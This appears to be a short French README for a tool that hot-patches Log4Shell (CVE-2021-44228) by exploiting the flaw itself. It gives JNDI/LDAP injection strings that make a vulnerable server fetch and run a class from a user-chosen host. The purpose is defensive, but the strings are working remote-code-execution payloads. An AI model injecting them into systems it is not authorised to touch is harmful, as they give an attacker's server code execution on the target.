
Corriger à chaud CVE-2021-44228 en exploitant la vulnérabilité elle-même.
Correction à chaud de CVE-2021-44228 en exploitant la vulnérabilité elle-même.
Injectez le code suivant dans tout endroit probablement vulnérable à CVE-2021-44228,
${jndi:ldap://votre-propre-serveur/patch}
Pour éviter une attaque MITM pendant le processus de correctif, la charge utile suivante est recommandée, mais avec une compatibilité moindre pour les anciennes versions de Java,
${jndi:ldap://votre-propre-serveur/any_string_except_patch}
Téléchargez les dernières versions
Spécifiez les variables d'environnement système LOG4J_HOTFIX_HTTP_PATH et LOG4J_HOTFIX_HTTPS_PATH si vous souhaitez héberger Hotfix.class sur votre propre serveur
Veuillez noter que Hotfix.java doit être compilé avec JDK6 pour une compatibilité maximale.